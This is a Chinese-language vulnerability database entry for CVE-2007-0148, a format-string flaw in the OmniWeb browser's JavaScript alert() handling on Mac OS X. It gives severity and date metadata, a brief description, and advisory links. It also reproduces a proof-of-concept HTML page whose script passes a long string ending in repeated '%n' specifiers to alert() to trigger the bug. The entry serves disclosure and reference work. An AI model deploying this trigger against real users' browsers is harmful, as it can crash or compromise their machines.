OmniWeb Javascript Alert()格式串处理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111956 漏洞类型 格式化字符串
发布时间 2007-01-07 更新时间 2007-01-10
CVE编号 CVE-2007-0148 CNNVD-ID CNNVD-200701-102
漏洞平台 OSX CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-102
|漏洞详情
OmniWeb是运行在MacOS上的浏览器。OmniWeb在处理alert()Javascript函数时存在格式串处理漏洞,如果用户受骗访问了恶意的WEB页面的话,就可能导致执行任意指令,攻击者从而控制用户机器。
|漏洞EXP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# milw0rm.com [2007-01-07]
|参考资料

来源:www.omnigroup.com
链接:http://www.omnigroup.com/applications/omniweb/releasenotes/
来源:VUPEN
名称:ADV-2007-0075
链接:http://www.frsirt.com/english/advisories/2007/0075
来源:SECUNIA
名称:23624
链接:http://secunia.com/advisories/23624
来源:MISC
链接:http://projects.info-pull.com/moab/MOAB-07-01-2007.html
来源:OSVDB
名称:31222
链接:http://osvdb.org/31222
来源:XF
名称:omniweb-alert-format-string(31324)
链接:http://xforce.iss.net/xforce/xfdb/31324
来源:BID
名称:21911
链接:http://www.securityfocus.com/bid/21911
来源:BUGTRAQ
名称:20070111DMA[2007-0107a]OmniWebJavascriptAlertFormatStringVulnerabiityandDMA[2007-0109a]AppleFinderDiskImageVolumeLabelOverflow/DoS
链接:http://www.securityfocus.com/archive/1/archive/1/456578/100/0/threaded
来源:MILW0RM
名称:3098
链接:http://www.milw0rm.com/exploits/3098
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2007-0107a%5D.txt
来源:MILW0RM
名称:3098
链接:http://milw0rm.com/exploits/3098
来源:blog.omnigroup.com
链接:http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/